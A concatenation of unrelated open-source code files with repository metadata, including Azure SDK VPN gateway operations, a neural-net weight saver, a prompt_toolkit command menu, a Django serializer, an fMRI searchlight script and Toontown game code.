cls = kwargs.pop('cls', None) # type: ClsType["_models.VpnGateway"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
gateway_name=gateway_name,
vpn_gateway_parameters=vpn_gateway_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VpnGateway', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore
def _update_tags_initial(
self,
resource_group_name, # type: str
gateway_name, # type: str
vpn_gateway_parameters, # type: "_models.TagsObject"
**kwargs # type: Any
):
# type: (...) -> "_models.VpnGateway"
cls = kwargs.pop('cls', None) # type: ClsType["_models.VpnGateway"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-08-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._update_tags_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(vpn_gateway_parameters, 'TagsObject')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('VpnGateway', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('VpnGateway', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_update_tags_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore
def begin_update_tags(
self,
resource_group_name, # type: str
gateway_name, # type: str
vpn_gateway_parameters, # type: "_models.TagsObject"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.VpnGateway"]
"""Updates virtual wan vpn gateway tags.
:param resource_group_name: The resource group name of the VpnGateway.
:type resource_group_name: str
:param gateway_name: The name of the gateway.
:type gateway_name: str
:param vpn_gateway_parameters: Parameters supplied to update a virtual wan vpn gateway tags.
:type vpn_gateway_parameters: ~azure.mgmt.network.v2018_08_01.models.TagsObject
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either VpnGateway or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2018_08_01.models.VpnGateway]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.VpnGateway"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._update_tags_initial(
resource_group_name=resource_group_name,
gateway_name=gateway_name,
vpn_gateway_parameters=vpn_gateway_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VpnGateway', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore
def _delete_initial(
self,
resource_group_name, # type: str
gateway_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-08-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
gateway_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes a virtual wan vpn gateway.
:param resource_group_name: The resource group name of the VpnGateway.
:type resource_group_name: str
:param gateway_name: The name of the gateway.
:type gateway_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
gateway_name=gateway_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore
def list_by_resource_group(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.ListVpnGatewaysResult"]
"""Lists all the VpnGateways in a resource group.
:param resource_group_name: The resource group name of the VpnGateway.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ListVpnGatewaysResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2018_08_01.models.ListVpnGatewaysResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ListVpnGatewaysResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-08-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ListVpnGatewaysResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways'} # type: ignore
def list(
self,
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.ListVpnGatewaysResult"]
"""Lists all the VpnGateways in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ListVpnGatewaysResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2018_08_01.models.ListVpnGatewaysResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ListVpnGatewaysResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-08-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ListVpnGatewaysResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/vpnGateways'} # type: ignore
| [
"noreply@github.com"
] | Azure.noreply@github.com |
b91811713854a626b904698f64ca3f4bd8e8740d | 2cc483723d7cb9c7a2b145b03e41a564e0c5449a | /app/save_weights.py | 0491cd1aebebbc6630ecd45aef737b48c80335c3 | [] | no_license | MattSegal/QueensSpeech | cb7331860393e30847dd0b4bb7dd9edd77ca3cb0 | cf868bacbaf5b0871dbccc7024ec06857b07aa5c | refs/heads/master | 2021-03-12T20:24:30.281294 | 2017-05-16T12:54:22 | 2017-05-16T12:54:22 | 91,458,300 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 845 | py | import cPickle
import numpy as np
import os.path
def get_name(file):
base_path = os.path.dirname(os.path.realpath(__file__))
return base_path + os.path.normpath('/weights/'+file)
f = open('net.pkl','rb')
net = cPickle.loads(f.read())
parallel_layer = net.layers[0]
hidden_layer_1 = net.layers[1]
hidden_layer_2 = net.layers[2]
softmax_layer = net.layers[3]
np.savetxt(get_name('0_weights.arr'),parallel_layer.layer.weights)
np.savetxt(get_name('1_weights.arr'),hidden_layer_1.weights)
np.savetxt(get_name('2_weights.arr'),hidden_layer_2.weights)
np.savetxt(get_name('3_weights.arr'),softmax_layer.weights)
np.savetxt(get_name('0_bias.arr'),parallel_layer.layer.bias)
np.savetxt(get_name('1_bias.arr'),hidden_layer_1.bias)
np.savetxt(get_name('2_bias.arr'),hidden_layer_2.bias)
np.savetxt(get_name('3_bias.arr'),softmax_layer.bias)
| [
"mattdsegal@gmail.com"
] | mattdsegal@gmail.com |
7329a13090fbf583b35134b78c4ef08362f28dc2 | 2dd3dd778f4f3ef3ca143636a42ce777e948dfc1 | /select_ptk2.py | 4d3d32d4f27ba2275054b5fd74b8458fa5c1c635 | [] | no_license | vaaaaanquish-xx/select-command-using-ptk | 64aea38b9b686c024a624baf2064cfe9f1cea255 | 07b6c7baddff15e8838a6b9b9a4b314450a9f1f9 | refs/heads/master | 2020-04-07T16:08:55.648027 | 2018-11-22T15:03:23 | 2018-11-22T15:03:23 | 158,517,117 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,009 | py | # -*- coding: utf-8 -*-
# ptk 2.x ver
from prompt_toolkit.application import Application
from prompt_toolkit.layout.margins import ScrollbarMargin
from prompt_toolkit.filters import IsDone
from prompt_toolkit.key_binding import KeyBindings
from prompt_toolkit.layout.containers import Window
from prompt_toolkit.layout.containers import ConditionalContainer
from prompt_toolkit.layout.containers import ScrollOffsets
from prompt_toolkit.layout.containers import HSplit
from prompt_toolkit.layout.controls import FormattedTextControl
from prompt_toolkit.layout.dimension import LayoutDimension as D
from prompt_toolkit.layout.layout import Layout
from prompt_toolkit.mouse_events import MouseEventType
from prompt_toolkit.styles import Style
from prompt_toolkit.styles import pygments_token_to_classname
from prompt_toolkit.styles.pygments import style_from_pygments_dict
from pygments.token import Token
import subprocess
choices = ['ls', 'ifconfig', 'pwd', 'who']
string_query = ' Command Select '
inst = ' (Use arrow keys)'
def selected_item(text):
res = subprocess.call(text)
print(res)
class InquirerControl(FormattedTextControl):
selected_option_index = 0
answered = False
def __init__(self, choices, **kwargs):
self.choices = choices
super(InquirerControl, self).__init__(self._get_choice_tokens, **kwargs)
@property
def choice_count(self):
return len(self.choices)
def _get_choice_tokens(self):
tokens = []
T = Token
def append(index, label):
selected = (index == self.selected_option_index)
def select_item(app, mouse_event):
self.selected_option_index = index
self.answered = True
token = T.Selected if selected else T
tokens.append((T.Selected if selected else T, ' > ' if selected else ' '))
if selected:
tokens.append((Token.SetCursorPosition, ''))
tokens.append((T.Selected if selected else T, '%-24s' % label, select_item))
tokens.append((T, '\n'))
for i, choice in enumerate(self.choices):
append(i, choice)
tokens.pop()
return [('class:'+pygments_token_to_classname(x[0]), str(x[1])) for x in tokens]
def get_selection(self):
return self.choices[self.selected_option_index]
ic = InquirerControl(choices)
def get_prompt_tokens():
tokens = []
T = Token
tokens.append((Token.QuestionMark, '?'))
tokens.append((Token.Question, string_query))
if ic.answered:
tokens.append((Token.Answer, ' ' + ic.get_selection()))
selected_item(ic.get_selection())
else:
tokens.append((Token.Instruction, inst))
return [('class:'+pygments_token_to_classname(x[0]), str(x[1])) for x in tokens]
HSContainer = HSplit([
Window(height=D.exact(1),
content=FormattedTextControl(get_prompt_tokens)),
ConditionalContainer(
Window(
ic,
width=D.exact(43),
height=D(min=3),
scroll_offsets=ScrollOffsets(top=1, bottom=1)
),
filter=~IsDone())])
layout = Layout(HSContainer)
kb = KeyBindings()
@kb.add('c-q', eager=True)
@kb.add('c-c', eager=True)
def _(event):
event.app.exit(None)
@kb.add('down', eager=True)
def move_cursor_down(event):
ic.selected_option_index = (
(ic.selected_option_index + 1) % ic.choice_count)
@kb.add('up', eager=True)
def move_cursor_up(event):
ic.selected_option_index = (
(ic.selected_option_index - 1) % ic.choice_count)
@kb.add('enter', eager=True)
def set_answer(event):
ic.answered = True
event.app.exit(None)
inquirer_style = style_from_pygments_dict({
Token.QuestionMark: '#5F819D',
Token.Selected: '#FF9D00',
Token.Instruction: '',
Token.Answer: '#FF9D00 bold',
Token.Question: 'bold'
})
app = Application(
layout=layout,
key_bindings=kb,
mouse_support=False,
style=inquirer_style
)
app.run()
| [
"6syun9@gmail.com"
] | 6syun9@gmail.com |
677e75005b39feb32f9b2e382f9ccb08f2840189 | c9b5ed2eb5d596f141004f7b82e79bc2fb36072d | /equipes/api/serializers.py | ac8cb9a5c81ec70d5e9358ed8f90924bad2664d4 | [] | no_license | jocsakesley/encontrocomcristo | 3fd670544a42abfc43f2c2d6a34c8e3fdd9d2550 | 8e9bbf41f6d80f2ac15fc4240ff4b108957d5cd6 | refs/heads/master | 2023-02-24T15:20:01.129002 | 2021-02-04T17:33:06 | 2021-02-04T17:33:06 | 330,020,768 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,535 | py | from rest_framework import serializers
from equipes.models import Equipe
from funcao.models import Funcao
from participantes.api.serializers import ParticipantesSerializer
from participantes.models import Participante
class EquipesSerializer(serializers.ModelSerializer):
lider = ParticipantesSerializer()
membros = ParticipantesSerializer(many=True)
class Meta:
model = Equipe
fields = "__all__"
def cria_membros(self, membros, equipes):
for membro in membros:
funcao = membro['funcao']
del membro['funcao']
func = Funcao.objects.get_or_create(**funcao)[0]
membro['funcao'] = func
mb = Participante.objects.get_or_create(**membro)[0]
print(mb)
equipes.membros.add(mb)
def create(self, validated_data):
print(dict(validated_data['lider']))
lider = validated_data['lider']
del validated_data['lider']
membros = validated_data['membros']
del validated_data['membros']
equipes = Equipe.objects.create(**validated_data)
self.cria_membros(membros, equipes)
funcao = dict(lider)
funcao = dict(funcao['funcao'])
print(funcao)
func = Funcao.objects.get_or_create(**funcao)[0]
lider = dict(lider)
lider['funcao'] = func
lid = Participante.objects.get_or_create(**lider)[0]
equipes.lider = lid
equipes.save()
return equipes
#def update(self, instance, validated_data): | [
"jocsadm@gmail.com"
] | jocsadm@gmail.com |
700c728094234c49a378ee39c18548edcf4cdc70 | 6d960d2ac7cb38f3e2db21cf59c10b2a734fcf42 | /code/scripts/searchlight_movie_perms.py | 78220d4547a9214baf26589ec742393540bbda49 | [
"MIT"
] | permissive | physthoth/sherlock-topic-model-paper | 2d86a1581ffc8a5fca553656bb1ca67f73bf634c | 4f77750c436264585879efb9f91957dc555f36a9 | refs/heads/master | 2020-09-25T11:13:32.457422 | 2018-10-08T18:40:17 | 2018-10-08T18:40:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,578 | py | import sys
import numpy as np
from nilearn.image import load_img
from brainiak.searchlight.searchlight import Searchlight
import pandas as pd
subid = int(sys.argv[1])
perm = int(sys.argv[2])
np.random.seed(perm)
# load fmri data
data = load_img('/idata/cdl/data/fMRI/andy/sherlock/data/sherlock_movie_s%s_10000.nii.gz' % str(subid)).get_data()
# load dtw warp path and extract the movie path
#path = np.load('/idata/cdl/data/fMRI/andy/sherlock/data/s%s_dtw_path.npy' % str(subid))
#movie_path = np.array(list(map(lambda x: x[0], path)))
# reindex the fmri data with the movie path
#data = data[:,:,:, movie_path]
# create the mask
mask = data[:,:,:,0]!=10000
# load video model
model = np.load('/idata/cdl/data/fMRI/andy/sherlock/data/movie_corrmat.npy')
# shift the video model
shift = np.random.randint(1, model.shape[0]-1)
shifted = np.roll(model, shift=shift, axis=0)
# recompute shifted correlation matrix
model = pd.DataFrame(shifted).T.corr().values
# Create searchlight object
params = dict(sl_rad=5)
sl = Searchlight(**params)
# Distribute data to processes
sl.distribute([data], mask)
sl.broadcast(model)
# Define voxel function
def sfn(l, msk, myrad, bcast_var):
from scipy.spatial.distance import cdist
from scipy.stats import pearsonr
b = l[0][msk,:].T
c = 1 - cdist(b, b, 'correlation').ravel()
return pearsonr(c, bcast_var.ravel())[0]
# Run searchlight
result = sl.run_searchlight(sfn)
np.save('/idata/cdl/data/fMRI/andy/sherlock/analyses/searchlight_movie/perms/s%s_perm%s_shift%s' % (str(subid), str(perm), str(shift)), result)
| [
"andrew.heusser@gmail.com"
] | andrew.heusser@gmail.com |
c2d7cb06a8b114a948211b5dd7d2cfe7c0012b7d | 1925c535d439d2d47e27ace779f08be0b2a75750 | /bloomberg/same_tree.py | e61ffeb81f1564b400d34c9b10a77d2466f534f5 | [] | no_license | arthurDz/algorithm-studies | ee77d716041671c4b8bb757d8d96f3d10b6589f7 | 1e4d23dd0c40df34f58d71c7ca3e6491be732075 | refs/heads/master | 2023-04-27T12:17:06.209278 | 2021-04-30T20:16:18 | 2021-04-30T20:16:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 841 | py | # Given two binary trees, write a function to check if they are the same or not.
# Two binary trees are considered the same if they are structurally identical and the nodes have the same value.
# Example 1:
# Input: 1 1
# / \ / \
# 2 3 2 3
# [1,2,3], [1,2,3]
# Output: true
# Example 2:
# Input: 1 1
# / \
# 2 2
# [1,2], [1,null,2]
# Output: false
# Example 3:
# Input: 1 1
# / \ / \
# 2 1 1 2
# [1,2,1], [1,1,2]
# Output: false
def isSameTree(self, p, q):
if not p and not q: return True
if (not p and q) or (not q and p) or (p.val != q.val): return False
return self.isSameTree(p.left, q.left) and self.isSameTree(p.right, q.right)
| [
"yunfan.yang@minerva.kgi.edu"
] | yunfan.yang@minerva.kgi.edu |
dd52c60b639b8ff8d22bc8853e5f0b95231434bd | 3d07a6eb8cba4f6821c4a36c508e2f2cf1e407ee | /ps6/ps6_3.py | 33b87f81d5ed9f3b5be283898e4429c8d8dd00e6 | [] | no_license | claraqqqq/i_c_s_p_a_t_m_i_t | d4aaa9a176b698e8c402674de0a1bfe2d0e1e6ae | 3a0cae66fab7320a55ed3403b11c042bd347dcda | refs/heads/master | 2021-01-19T09:44:50.012962 | 2015-04-07T15:13:45 | 2015-04-07T15:13:45 | 29,719,682 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 759 | py | # ENCRYPTION
"""
strings. encode to them use to able be should you applyCoder, and buildCoder written have you Once
Cases Test
8) test.', a is applyShift('This >>>
bmab.' i qa 'Bpqa
18) bmab.', i qa applyShift('Bpqa >>>
test.' a is 'This
"""
def applyShift(text, shift):
"""
shift given the by shifted Caesar text new a returns text, a Given
case upper case, lower remain should letters case Lower offset.
should punctuation other all and case, upper remain should letters
is. it as stay
to shift the apply to string text:
26) < int <= (0 text the shift to amount shift:
amount. specified by shifted being after text returns:
"""
### TODO.
### HINT: This is a wrapper function.
coder = buildCoder(shift)
return applyCoder(text, coder)
| [
"claraqqqq@gmail.com"
] | claraqqqq@gmail.com |
a510e0648dd38fe7c0ec63582bf5a346f19838c2 | eeb469954b768095f2b8ad2376f1a114a3adb3fa | /961.py | 9ceaffbdf9802217725e20fd681051191aa438b9 | [
"MIT"
] | permissive | RafaelHuang87/Leet-Code-Practice | ef18dda633932e3cce479f7d5411552d43da0259 | 7754dcee38ffda18a5759113ef06d7becf4fe728 | refs/heads/master | 2020-07-18T20:09:10.311141 | 2020-02-11T09:56:39 | 2020-02-11T09:56:39 | 206,305,113 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 274 | py | """
Solution for Leet Code 961.
"""
class Solution:
def repeatedNTimes(A):
temp = {}
for data in A:
if data not in temp:
temp[data] = 1
else:
return data
print(Solution.repeatedNTimes([1,3,2,1])) | [
"rafaelhuang@163.com"
] | rafaelhuang@163.com |
5388a6574e30e9d7340f6908a1a97e1f2eedf4c7 | da1721d2783ea4d67ff4e73cee6eee71292f2ef7 | /toontown/ai/DistributedSillyMeterMgr.py | a45f47422f60ca9ce436eee33a9023ca2d40d653 | [
"BSD-3-Clause"
] | permissive | open-toontown/open-toontown | bbdeb1b7bf0fb2861eba2df5483738c0112090ca | 464c2d45f60551c31397bd03561582804e760b4a | refs/heads/develop | 2023-07-07T01:34:31.959657 | 2023-05-30T23:49:10 | 2023-05-30T23:49:10 | 219,221,570 | 143 | 104 | BSD-3-Clause | 2023-09-11T09:52:34 | 2019-11-02T22:24:38 | Python | UTF-8 | Python | false | false | 2,339 | py | from direct.directnotify import DirectNotifyGlobal
from direct.distributed import DistributedObject
from toontown.ai import DistributedPhaseEventMgr
import time
class DistributedSillyMeterMgr(DistributedPhaseEventMgr.DistributedPhaseEventMgr):
neverDisable = 1
notify = DirectNotifyGlobal.directNotify.newCategory('DistributedSillyMeterMgr')
def __init__(self, cr):
DistributedPhaseEventMgr.DistributedPhaseEventMgr.__init__(self, cr)
cr.SillyMeterMgr = self
def announceGenerate(self):
DistributedPhaseEventMgr.DistributedPhaseEventMgr.announceGenerate(self)
messenger.send('SillyMeterIsRunning', [self.isRunning])
def delete(self):
self.notify.debug('deleting SillyMetermgr')
messenger.send('SillyMeterIsRunning', [False])
DistributedPhaseEventMgr.DistributedPhaseEventMgr.delete(self)
if hasattr(self.cr, 'SillyMeterMgr'):
del self.cr.SillyMeterMgr
def setCurPhase(self, newPhase):
DistributedPhaseEventMgr.DistributedPhaseEventMgr.setCurPhase(self, newPhase)
messenger.send('SillyMeterPhase', [newPhase])
def setIsRunning(self, isRunning):
DistributedPhaseEventMgr.DistributedPhaseEventMgr.setIsRunning(self, isRunning)
messenger.send('SillyMeterIsRunning', [isRunning])
def getCurPhaseDuration(self):
if len(self.holidayDates) > 0:
startHolidayDate = self.holidayDates[self.curPhase]
if self.curPhase + 1 >= len(self.holidayDates):
self.notify.error('No end date for phase %' % self.curPhase)
return -1
else:
endHolidayDate = self.holidayDates[self.curPhase + 1]
startHolidayTime = time.mktime(startHolidayDate.timetuple())
endHolidayTime = time.mktime(endHolidayDate.timetuple())
holidayDuration = endHolidayTime - startHolidayTime
if holidayDuration < 0:
self.notify.error('Duration not set for phase %' % self.curPhase)
return -1
else:
return holidayDuration
else:
self.notify.warning('Phase dates not yet known')
return -1
def getCurPhaseStartDate(self):
if len(self.holidayDates) > 0:
return self.holidayDates[self.curPhase]
| [
"jwcotejr@gmail.com"
] | jwcotejr@gmail.com |
e46324e4c2af8516a88d6a572cc626d581a0d47e | 1a17167c38dc9a12c1f72dd0f3ae7288f5cd7da0 | /Source/ThirdParty/angle/scripts/export_targets.py | 47eb67c26cfd00c933217b50d08d641e42f9723d | [
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause",
"LicenseRef-scancode-warranty-disclaimer",
"Zlib",
"LicenseRef-scancode-khronos",
"BSL-1.0",
"BSD-2-Clause"
] | permissive | elix22/Urho3D | c57c7ecb58975f51fabb95bcc4330bc5b0812de7 | 99902ae2a867be0d6dbe4c575f9c8c318805ec64 | refs/heads/master | 2023-06-01T01:19:57.155566 | 2021-12-07T16:47:20 | 2021-12-07T17:46:58 | 165,504,739 | 21 | 4 | MIT | 2021-11-05T01:02:08 | 2019-01-13T12:51:17 | C++ | UTF-8 | Python | false | false | 9,240 | py | #! /usr/bin/env python3
assert __name__ == '__main__'
'''
To update ANGLE in Gecko, use Windows with git-bash, and setup depot_tools, python2, and
python3. Because depot_tools expects `python` to be `python2` (shame!), python2 must come
before python3 in your path.
Upstream: https://chromium.googlesource.com/angle/angle
